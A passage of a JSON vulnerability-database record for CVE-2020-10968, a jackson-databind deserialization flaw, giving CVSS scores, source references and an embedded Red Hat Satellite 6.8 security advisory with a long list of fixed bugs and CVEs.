"trust": 0.8,
"vendor": "fasterxml",
"version": "2.9.10.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003420"
},
{
"db": "NVD",
"id": "CVE-2020-10968"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:fasterxml:jackson-databind",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003420"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1625"
}
],
"trust": 1.4
},
"cve": "CVE-2020-10968",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-10968",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-003420",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-163499",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-10968",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003420",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-10968",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2020-10968",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-003420",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1625",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-163499",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-10968",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163499"
},
{
"db": "VULMON",
"id": "CVE-2020-10968"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1625"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003420"
},
{
"db": "NVD",
"id": "CVE-2020-10968"
},
{
"db": "NVD",
"id": "CVE-2020-10968"
}
]
},
"description": {
"_id": null,
"data": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy). FasterXML jackson-databind Exists in an unreliable data deserialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. There is a code problem vulnerability in org.aoju.bus.proxy.provider.remoting.RmiProvider in FasterXML jackson-databind 2.x version before 2.9.10.4. A remote attacker could exploit this vulnerability with specially crafted input to execute arbitrary code on the system. You must be logged in to download the update. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: Satellite 6.8 release\nAdvisory ID: RHSA-2020:4366-01\nProduct: Red Hat Satellite 6\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:4366\nIssue date: 2020-10-27\nCVE Names: CVE-2018-3258 CVE-2018-11751 CVE-2019-12781\n CVE-2019-16782 CVE-2020-5216 CVE-2020-5217\n CVE-2020-5267 CVE-2020-7238 CVE-2020-7663\n CVE-2020-7942 CVE-2020-7943 CVE-2020-8161\n CVE-2020-8184 CVE-2020-8840 CVE-2020-9546\n CVE-2020-9547 CVE-2020-9548 CVE-2020-10693\n CVE-2020-10968 CVE-2020-10969 CVE-2020-11619\n CVE-2020-14061 CVE-2020-14062 CVE-2020-14195\n CVE-2020-14334 CVE-2020-14380\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat Satellite 6.8 for RHEL 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Satellite 6.7 - noarch, x86_64\nRed Hat Satellite Capsule 6.8 - noarch, x86_64\n\n3. Description:\n\nRed Hat Satellite is a systems management tool for Linux-based\ninfrastructure. It allows for provisioning, remote management, and\nmonitoring of multiple Linux deployments with a single centralized tool. \n\nSecurity Fix(es):\n\n* mysql-connector-java: Connector/J unspecified vulnerability (CPU October\n2018) (CVE-2018-3258)\n* netty: HTTP Request Smuggling due to Transfer-Encoding whitespace\nmishandling (CVE-2020-7238)\n* rubygem-websocket-extensions: ReDoS vulnerability in\nSec-WebSocket-Extensions parser (CVE-2020-7663)\n* puppet: puppet server and puppetDB may leak sensitive information via\nmetrics API (CVE-2020-7943)\n* jackson-databind: multiple serialization gadgets (CVE-2020-8840\nCVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969\nCVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195)\n* foreman: unauthorized cache read on RPM-based installations through local\nuser (CVE-2020-14334)\n* Satellite: Local user impersonation by Single sign-on (SSO) user leads to\naccount takeover (CVE-2020-14380)\n* Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS\n(CVE-2019-12781)\n* rubygem-rack: hijack sessions by using timing attacks targeting the\nsession id (CVE-2019-16782)\n* rubygem-secure_headers: limited header injection when using dynamic\noverrides with user input (CVE-2020-5216)\n* rubygem-secure_headers: directive injection when using dynamic overrides\nwith user input (CVE-2020-5217)\n* rubygem-actionview: views that use the `j` or `escape_javascript` methods\nare susceptible to XSS attacks (CVE-2020-5267)\n* puppet: Arbitrary catalog retrieval (CVE-2020-7942)\n* rubygem-rack: directory traversal in Rack::Directory (CVE-2020-8161)\n* rubygem-rack: percent-encoded cookies can be used to overwrite existing\nprefixed cookie names (CVE-2020-8184)\n* hibernate-validator: Improper input validation in the interpolation of\nconstraint error messages (CVE-2020-10693)\n* puppet-agent: Puppet Agent does not properly verify SSL connection when\ndownloading a CRL (CVE-2018-11751)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\n* Provides the Satellite Ansible Modules that allow for full automation of\nyour Satellite configuration and deployment. \n\n* Adds ability to install Satellite and Capsules and manage hosts in a IPv6\nnetwork environment\n\n* Ansible based Capsule Upgrade automation: Ability to centrally upgrade\nall of your Capsule servers with a single job execution. \n\n* Platform upgrades to Postgres 12, Ansible 2.9, Ruby on Rails and latest\nversion of Puppet\n\n* Support for HTTP UEFI provisioning\n\n* Support for CAC card authentication with Keycloak integration\n\n* Add ability to upgrade Red Hat Enterprise Linux 7 hosts to version 8\nusing the LEAPP based tooling. \n\n* Support for Red Hat Enterprise Linux Traces integration\n\n* satellite-maintain \u0026 foreman-maintain are now self updating\n\n* Notifications in the UI to warn users when subscriptions are expiring. \n\nThe items above are not a complete list of changes. This update also fixes\nseveral bugs and adds various enhancements. Documentation for these changes\nis available from the Release Notes document linked to in the References\nsection. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1160344 - [RFE] Satellite support for cname as alternate cname for satellite server\n1261802 - [RFE] Make the foreman bootdisk full-host image work on UEFI systems\n1300211 - capsule-certs-generate failed to increment release number when generating certificate rpm for foreman-proxy\n1332702 - smart-proxy-openscap-send with additional features - alert if file corrupt\n1398317 - For the vms built by Satellite 6 using \"Network Based\" installation mode on VMWare, unable to change the boot sequence via BIOS\n1410616 - [RFE] Prominent notification of expiring subscriptions. \n1410916 - Should only be able to add repositories you have access to\n1429033 - Host provisioned with RHEL Workstation OS, after provisioning displayed as generic RedHat 7.3\n1461781 - [RFE]A button should be available in the GUI to clear the recurring logics. \n1469267 - need updated rubygem-rake\n1486446 - Content view versions list has slow query for package count\n1486696 - \u0027hammer host update\u0027 removes existing host parameters\n1494180 - Sorting by network address for subnet doesn\u0027t work properly\n1501499 - tomcat listens to 0.0.0.0 for serving requests but just needs localhost\n1503037 - [RFE] Cancelled future/recurring job invocations should not get the status \"failed\" but rather \"cancelled\"\n1505842 - Remote Execution engine: Error initializing command: Net::SSH::HostKeyMismatch - fingerprint 20:a9:b7:45:1a:b7:d6:42:1e:03:d1:1f:06:20:4c:e2 does not match for \"172.17.0.101\"\n1531674 - Operating System Templates are ordered inconsistently in UI. \n1537320 - [RFE] Support for Capsules at 1 version lower than Satellite\n1543316 - Satellite 6.2 Upgrade Fails with error \"rake aborted! NoMethodError: undefined method `first\u0027 for nil:NilClass\" when there are custom bookmarks created\n1563270 - Sync status information is lost after cleaning up old tasks related to sync. \n1569324 - Webrick is unable to use 2 supported TLS v1.2 ciphers (\u0027ECDHE-RSA-AES128-GCM-SHA256\u0027, \u0027ECDHE-RSA-AES256-GCM-SHA384\u0027)\n1571907 - Passenger threads throwing tracebacks on API jobs after spawning\n1576859 - [RFE] Implement automatic assigning subnets through data provided by facter\n1584184 - [RFE] The locked template is getting overridden by default\n1601101 - [RFE] Add autofill functionality to the Job invocation Search query box, copy from Hosts search box\n1607706 - [RFE] Add support for --vlanid in Satellite Kickstart Default provisioning template\n1608001 - Rearrange search/filter options on Red Hat Repositories page. \n1613391 - race condition on removing multiple organizations simultaneously\n1619274 - [RFE] Red Hat Satellite should now be able to discover and provision bare metal machines via UEFI HTTP boot\n1619422 - User Agent for Downstream RSS feed still says Foreman and Foreman Version\n1620214 - Page should auto-refresh after subscriptions have been modified on the Satellite webui\n1624049 - Changing the organization in the Satellite WebUI does not change the sync plan page information from the previous organization\n1625258 - Having empty \"Allocation (GB)\" when creating a new Host, nil:NilClass returned on creating the Host\n1627066 - Unable to revert to the original version of the provisioning template\n1630433 - [RFE] Include Ansible Satellite modules with Ansible Core modules\n1630536 - yum repos password stored as cleartext\n1632577 - Audit log show \u0027missing\u0027 for adding/removing repository to a CV\n1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)\n1645062 - host_collection controller responds with 200 instead of 201 to a POST request\n1645749 - repositories controller responds with 200 instead of 201 to a POST request\n1647216 - Lack of edit_smart_proxies permission causes error when setting host to Build\n1647364 - [RFE] Extend the audits by the http request id\n1647781 - Audits contain no data (Added foo to Missing(ID: x))\n1651297 - Very slow query when using facts on user roles as filters\n1653217 - [RFE] More evocative name for Play Ansible Roles option?\n1654347 - Satellite may create duplicate CreateRssNotifications tasks after restarting foreman tasks\n1654375 - [RFE] Mention specifically uder the admin chexbox for AD LDAP user if its created with admin role,\n1659418 - katello-tracer-upload failing with error \"ImportError: No module named katello\"\n1665277 - subscription manager register activation key with special character failed\n1665893 - candlepin refuses to start or hangs periodically when having too many messages in ActiveMQ journal\n1666693 - Command \"hammer subscription list\" is not correctly showing the comment \"Guests of \" in the \"Type\" field in the output. \n1677907 - Ansible API endpoints return 404\n1680157 - [RFE] Puppet \u0027package\u0027 provider type does not support selecting modularity streams\n1680458 - Locked Report Templates are getting removed. \n1680567 - Reporting Engine API to list report template per organization/location returns 404 error\n1681619 - [RFE] Disable the option to enter a MAC address after selecting a compute resource while creating new hosts through Satellite\n1685949 - [RFE] Support passing of attribute name instead of Id\u0027s in RHV workflow\n1687116 - kernel version checks should not use /lib/modules to determine running version\n1688886 - subscription-manager not attaching the right quantity per the cpu core\n1691416 - Delays when many clients upload tracer data simultaneously\n1697476 - [RFE] To be able to see the name of the provisioning template being used to build a host from the host itself\n1702434 - foreman-bootloaders-redhat-tftpboot expected file permissions in package don\u0027t match runtime permissions\n1705097 - An empty report file doesn\u0027t show any headers\n1709557 - [RFE] warn the user if they have done a select all and it includes the restart|reboot service\n1709842 - Tracer shows the machines needs rebooting even after reboot if kernel-debug is installed\n1710511 - Filter by os_minor includes unexpected values on the Satellite web UI. \n1715999 - Use Infoblox API for DNS conflict check and not system resolver\n1716423 - Nonexistent quota can be set\n1717403 - Broken breadcrumbs link to compute resource VM list on VM detail page\n1718012 - [RFE] Add a hard limit of 100 items to restrict any fact child-hash/array\n1718954 - [RFE] When the contentAccessMode is set to org_environment for an owner, we should disable auto-attach globally\n1719509 - [RFE] \"hammer host list\" including erratas information\n1719516 - [RFE] \"hammer host-collection hosts\" including erratas information\n1720725 - [RFE] Ability to override DHCP options and wait_after_restart option for race condition\n1721419 - SSH key cannot be added when FIPS enabled\n1722954 - Slow performance when running \"hammer host list\" with a high number of Content Hosts (15k+ for example)\n1723313 - foreman_tasks:cleanup description contain inconsistent information\n1724494 - [Capsule][smart_proxy_dynflow_core] \"PID file /var/run/foreman-proxy/smart_proxy_dynflow_core.pid not readable (yet?) after start\"\n1724497 - CVE-2019-12781 Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS\n1726768 - [RFE] Red Hat Satellite 6 GUI, Tasks should show Full name\n1729968 - Editing disk size of a Compute Profile for a VMware Compute Resource makes the whole Storage section disappear\n1730083 - [RFE] Add Jobs button to host detail page\n1731155 - Cloud init template missing snippet compared to Kickstart default user data\n1731229 - podman search against Red Hat Satellite 6 fails. \n1731235 - [RFE] Create Report Template to list inactive hosts\n1733241 - [RFE] hammer does not inherit parent location information\n1733650 - Satellite receives RPM1004 pulp error and 403 Forbidden http error retrieving packages from CDN\n1736809 - undefined method `split\u0027 for nil:NilClass when viewing the host info with hammer\n1737135 - Content Hosts loses subscriptions after Vmotion and auto attach is unable to assigned the subscriptions if any other subscription is already attached to the host. \n1737564 - [RFE] Support custom images on Azure\n1738548 - Parameter --openscap-proxy-id is missing in hammer host create command. \n1740943 - Increasing Ansible verbosity level does not increase the verbosity of output\n1743056 - While creating a host for a particular location, all the domains are in the pull down list, even if only one domain is selected for that location. \n1743776 - Error while deleting the content view version. \n1745516 - Multiple duplicate index entries are present in candlepin database\n1746936 - satellite6 is not using remote execution by default even after setting remote execution by default from satellite web-UI. \n1749692 - Default Rhel8 scap content does not get populated on the Satellite\n1749916 - [RFE] Satellite should support certificates with \u003e 2048 Key size\n1751981 - Parent object properties are not propagated to Child objects in Location and Host Group\n1752880 - katello-host-tools-tracer stats paths abusively, leading to a hang or slowness of yum command\n1753551 - Traces output from Satellite GUI has mismatches with client tracer output\n1756991 - 2 inputs with same name -\u003e uninitialized constant #\u003cClass:0x000000000b894c38\u003e::NonUniqueInputsError\n1757317 - [RFE] Dynflow workers extraction\n1757394 - [BUG] Non-admin users always get \"Missing one of the required permissions\" message while accessing their own table_preferences via Satellite 6 API\n1759160 - Rake task for cleaning up DHCP records on proxy\n1761872 - Disabled buttons are still working\n1763178 - [RFE] Unnecessary call to userhelp and therefore log entries\n1763816 - [RFE] Report which users access the API\n1766613 - Fact search bar broken and resets to only searching hostname\n1766906 - Associating more than 10 Ansible roles to a Host only sets based on the per-page setting\n1767497 - Compute Resource filter does not correctly allow Refresh Cache\n1767635 - [RFE] Enable Organization and Location to be entered not just selected\n1770366 - [RFE] Improve upgrade efficiency by moving RPM post-installation scripts to the installer. \n1770544 - Puppet run job notification do not populate \"%{puppet_options}\"\u0027 value\n1770777 - Changing concurrency level while executing Ansible jobs fail with NoMethodError: undefined method `[]\u0027 for nil:NilClass\n1771367 - undefined method `request_uri\u0027 when Openidc Provider Token Endpoint is none\n1771428 - Openscap documentation link on Satellite 6 webui is broke\n1771484 - Client side documentation links are not branded\n1771693 - \u0027Deployed on\u0027 parameter is not listed in API output\n1772381 - Incorrect example to use multiple attributes as a matcher key in the tooltip for Order\n1772517 - login with the user name as same as existing user group gives 500 ISE and wont allow user to login again\n1772544 - Use APIv4 is not the default when creating a new compute resource in ovirt\n1773298 - GET /katello/api/srpms/compare always fails with error: Missing template katello/api/v2/common/compare\n1774710 - UI: When selecting the server type in ldap authentication, \"attribute mappings\" fields could be populated automatically\n1778396 - exporting/importing report template process is causing a different report during the visualization (blank lines)\n1778503 - Prepended text on OS name creation\n1778681 - Some pages are missing title in html head\n1779638 - Unable to filter/search http-proxies using Organization/Location for Satellite UI. \n1781671 - While using concurrency_level in remote execution, job progress in WebUI is not being updated properly\n1782352 - [RHEL 8.1 client] All packages are not getting updated after click on \"Update All Packages\"\n1782426 - Viewing errata from a repository returns incorrect unfiltered results\n1783568 - [RFE] - Bulk Tracer Remediation\n1783882 - Ldap refresh failed with \"Validation failed: Adding would cause a cycle!\"\n1784012 - Default kickstart places log to /mnt/sysimage/root/install.post.log\n1784341 - disable CertificateRevocationListTask job in candlepin.conf by default\n1785117 - [RFE] Add functionality in foreman logging to hash-out or mark as [FILTERED] the password in /var/log/foreman-maintain/foreman-maintain.log and /var/log/foreman-installer/satellite.log file\n1785231 - Ansible Variable override to false does not gets reflected on client machine on Red Hat Satellite 6. \n1785624 - [UI] Importing templates with associate \u0027never\u0027 is not resulting as expected\n1785683 - Does not load datacenter when multiple compute resources are created for same VCenter\n1785902 - Ansible RunHostJob tasks failed with \"Failed to initialize: NoMethodError - undefined method `[]\u0027 for nil:NilClass\"\n1785940 - [RFE] Reporting template should allow host filtering based on applicable errata issue date\n1787329 - change filename in initrd live CPIO archive to fdi.iso\n1788261 - CVE-2018-11751 puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL\n1788958 - [RFE] add \"elapsed time\" column to export and hammer, make it filterable in WebUI\n1789006 - Smart proxy dynflow core listens on 0.0.0.0\n1789100 - CVE-2019-16782 rubygem-rack: hijack sessions by using timing attacks targeting the session id\n1789434 - Template editor not always allows refreshing of the preview pane\n1789522 - On unhealthy Satellite, dynflow_envelopes table might grow indefinitely\n1789686 - Non-admin user with enough permissions can\u0027t generate report of applicable errata\n1789815 - The \"start\" parameter should be mentioned inside \"--compute-attributes:\" in hammer_cli for Satellite 6\n1789911 - \"foreman-rake katello:publish_unpublished_repositories\" is referring to column which no longer exists in katello_repositories table. \n1789924 - [RFE] As user I want to see a \"disabled\" status for Simple Content Access (Golden Ticketed) Orgs\n1791654 - drop config_templates api endpoints and parameters\n1791656 - drop deprecated host status endpoint\n1791658 - drop reports api endpoint\n1791659 - Remove `use_puppet_default` api params\n1791663 - remove deprecated permissions api parameters\n1791665 - drop deprecated compute resource uuid parameter\n1792131 - [UI] Could not specify organization/location for users that come from keycloak\n1792135 - Not able to login again if session expired from keycloak\n1792174 - [RFE] Subscription report template\n1792304 - When generating custom report, leave output format field empty\n1792378 - [RFE] Long role names are cut off in the roles UI\n1793951 - [RFE] Display request UUID on audits page\n1794015 - When using boot disk based provisioning, sometimes foreman tries to recreate folder foreman_isos in the datastore even when the folder already exists\n1794346 - Change the label for the flashing eye icon during user impersonation\n1794641 - Sync status page\u0027s content are not being displayed properly. \n1795809 - HTML tags visible on paused task page\n1796155 - [RFE] host_collections not available in reporting engine unless safe mode disabled\n1796205 - iso upload: correctly check if upload directory exists\n1796225 - CVE-2020-7238 netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling\n1796259 - loading subscriptions page is very slow\n1796697 - Unable to list/enable EUS repositories on the RHEL clients registered in the satellite server with org_environment contentAccessMode\n1798489 - [RHSSO] - If Access Token Lifespan is set to 5 mins then the user is getting sign out instead after idle SSO timeout\n1798668 - Configure default MongoDB WiredTiger cache to be 20% of RAM in the Satellite server\n1799480 - CLI - hammer repository info shows blank sync status if the repository sync is in warning/error state. \n1800503 - In Hammer, it is not possible to set default keyboard layout for a RHEV host\n1801264 - CVE-2020-5217 rubygem-secure_headers: directive injection when using dynamic overrides with user input\n1801286 - CVE-2020-5216 rubygem-secure_headers: limited header injection when using dynamic overrides with user input\n1802529 - Repository sync in tasks page shows percentage in 17 decimal points\n1802631 - Importing Ansible variables yields NoMethodError: undefined method `map\u0027 for nil:NilClass (initialize_variables) [variables_importer.rb]\n1803846 - Red Hat Insights Risk Summary shows systems at risk while there are none\n1804496 - While performing bulk actions, unable to select all tasks under Monitor --\u003e Tasks page. \n1804651 - Missing information about \"Create Capsule\" via webUI\n1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages\n1805727 - Default Custom Repository download policy setting refers to old name (Default Repository download policy) in satellite 6.7\n1806713 - hypervisor checkin fails with cp_consumer_hypervisor_ukey error\n1806842 - Disabling dynflow_enable_console from setting should hide \"Dynflow console\" in Tasks\n1806897 - Red Hat Inventory Uploads fail with NoMethodError: undefined method `mtu\u0027\n1807042 - [RFE] Support additional disks for VM on Azure Compute Resource\n1807321 - A non-admin users with view recurring_logics permissions are unable to list recurring logics. \n1807829 - Generated inventory file doesn\u0027t exist\n1807946 - Multiple duplicate index entries are present in foreman database\n1808843 - Satellite lists unrelated RHV storage domains using v4 API\n1810250 - Unable to delete repository - Content with ID could not be found\n1810549 - dropping packets to qdrouterd triggers a memory leak in qpid-proton 0.28.0-2 libraries used by goferd\n1810774 - Applying errata via Host Collection the errata are trying to be applied to all hosts associated with the host collection\n1811390 - Links to an errata list of a repository lack repositoryId in URI and points to generic \"errata\" page instead\n1812031 - Improve regenerate applicability tasks performance by querying NEVRA only data from repo_content_units\n1812858 - Satellite Inventory Plugin does not appear to make reports which match yupana\u0027s API specification\n1812904 - \u0027Hypervisors\u0027 task fails with \u0027undefined method `[]\u0027 for nil:NilClass\u0027 error\n1813005 - Prevent --tuning option to be applied in Capsule servers\n1813313 - [Tracker] Test HTTP UEFI on IPv6 (QA only tracker)\n1814095 - Applicable errata not showing up for module stream errata\n1815104 - Locked provisioning template should not be allowed to add audit comment\n1815135 - hammer does not support description for custom repositories\n1815146 - Backslash escapes when downloading a JSON-formatted report multiple times\n1815608 - Content Hosts has Access to Content View from Different Organization\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1816699 - Satellite Receptor Installer role can miss accounts under certain conditions\n1816720 - CVE-2020-7942 puppet: Arbitrary catalog retrieval\n1816853 - Report generated by Red Hat Inventory Uploads is empty. \n1817215 - Admin must be able to provide all the client ids involved inside Satellite settings. \n1817224 - Loading one org\u0027s content view when switching to a different org\n1817481 - Plugin does not set page \u003ctitle\u003e\n1817728 - Default task polling is too frequent at scale\n1817874 - After data upload from satellite UI it is not visible on cloud.redhat.com. \n1818062 - Deprecated message about katello agent being shown on content host registration page\n1818816 - Web console should open in a new tab/window\n1819145 - [RFE] Incorporate apipie-dsl to document template macros, provided as one-time generated HTML document\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1820193 - Deleted Global Http Proxy is still being used during repository sync. \n1820245 - reports in JSON format can\u0027t handle unicode characters\n1821182 - [Repository] - Packages are not getting synced with rpm-with-sha-512\n1821335 - Inventory plugin captures information for systems with any entitlement\n1821457 - [RFE] Capsules shouldn\u0027t update hosts\u0027 \"Registered through\" facts on the Satellite server in a load-balanced configuration. \n1821629 - Eager zero seems to do nothing\n1821651 - Manifest import task progress remains at 0. \n1821752 - New version of the plugin is available: 1.0.5\n1822039 - Get HTTP error when deploying the virt-who configure plugin\n1822560 - Unable to sync large openshift docker repos\n1823905 - Update distributor version to sat-6.7\n1823991 - [RFE] Add a more performant way to sort reports\n1824183 - Virtual host get counted as physical hosts on cloud.redhat.com\n1824931 - After upgrading to Satellite 6.7 the Tasks page in WebUI goes \"Blank\"\n1825760 - schedule inventory plugin sync failed due to \u0027organization_id\u0027 typecasting issue. \n1825930 - [Regression] RedHat Insights client proxying stopped working due to missing proxy\n1825978 - Manifest refresh failed with \u0027Katello::Errors::CandlepinError Invalid credentials.\u0027 error\n1826298 - even when I cancel ReX job, remediation still shows it as running\n1826340 - [RFE] Ability to provision a VM using Red Hat Gold BYOS images\n1826515 - [RFE] Consume Candlepin events via STOMP\n1826625 - Improve performance of externalNodes\n1826678 - New version of the plugin is available: 2.0.6\n1826734 - Tasks uses wrong controller name for bookmarks\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1827389 - Manifest import and delete calls Actions::Pulp::Repository::Refresh for non-Library repositories\n1827583 - Installing dhcp_isc and dhcp_remote_isc fails with \"You cannot specify the same gem twice with different version requirements.....You specified: rsec (\u003c 1) and rsec (\u003e= 0)\"\n1828257 - Receptor init file missing [Install] section, receptor service won\u0027t run after restart\n1828486 - CVE-2020-7943 puppet: puppet server and puppetDB may leak sensitive information via metrics API\n1828549 - Manifest Certificate Exposed by Unprivileged User\n1828682 - Create compute resource shows console error \u0027Cannot read property \u0027aDataSort\u0027 of undefined\u0027\n1828789 - [RFE] Satellite installer should support installing the Satellite Inventory Provider by default\n1828868 - Add keep alive option in Receptor node\n1829487 - Ansible verbosity level does not work\n1829766 - undefined method `tr\u0027 for nil:NilClass when trying to get a new DHCP lease from infoblox\n1830253 - Default job templates are not locked\n1830403 - Capsule sync fails when promoting a content view to more than one lifecyle env at the same time\n1830834 - Unable to update default value of a smart class parameter (Sql query error). \n1830860 - Refactor loading regions based on subscription dynamically\n1830882 - Red Hat Satellite brand icon is missing\n1830884 - bootstrap.py script tries to yum install puppet package that is not in rhel-7-server-satellite-tools-6.7-rpms repo\n1831528 - CVE-2020-5267 rubygem-actionview: views that use the `j` or `escape_javascript` methods are susceptible to XSS attacks\n1833031 - Improve RH account ID fetching in cloud connector playbook\n1833035 - Add remediation bulk ack message (i.e. all hosts for a given run has finished)\n1833039 - Introduce error code to playbook_run_finished response type\n1833311 - \"Failed to save: Failed to save when overriding parameters for ansible, cause: Default value is invalid\" while creating scap policy with ansible deployment option. \n1834302 - --enable-foreman-plugin-rh-cloud fails: Execution of \u0027/bin/yum -d 0 -e 0 -y install tfm-rubygem-foreman_rh_cloud\u0027 returned 1: Error: Nothing to do\n1834377 - Disable mongo FTDC\n1834866 - Missing macro for \"registered_at\" host subscription facet\n1834898 - Login Page background got centralized and cropped\n1835189 - Missing macro for \"host_redhat_subscriptions\" in host subscription facet\n1835241 - Some applicability of the consumers are not recalculated after syncing a repository\n1835882 - While executing \"Configure Cloud Connector\" playbook on Satellite 6.7 server it does not honour HTTP Proxy setting\n1836155 - Support follow on rails, travis and i18n work for AzureRm plugin\n1836771 - In satellite installation summary report, satellite should be mentioned instead of foreman. \n1836774 - Some foreman services failed to start (pulp_streamer)\n1836845 - \"Generate at\" in report template should be current date\n1837951 - \"invalid Unicode Property \\p: /\\b\\perform various actions through those proxies\\b(?!-)/\" warning messages appears in dynflow-sidekiq@worker-hosts-queue\n1838160 - \u0027Registered hosts\u0027 report does not list kernel release for rhsm clients\n1838191 - Arrow position is on left rather in the middle under \"Start Time\"\n1838281 - CVE-2020-8161 rubygem-rack: directory traversal in Rack::Directory\n1838917 - Repositories are not showing their available Release versions due to a low default db pool size\n1838963 - Hypervisors from Satellite, never makes their way to HBI\n1838965 - Product name link is not working on the activation keys \"Repository Sets\" tab. \n1839025 - Configure Cloud Connector relies on information which is no longer provided by the API\n1839649 - satellite-installer --reset returns a 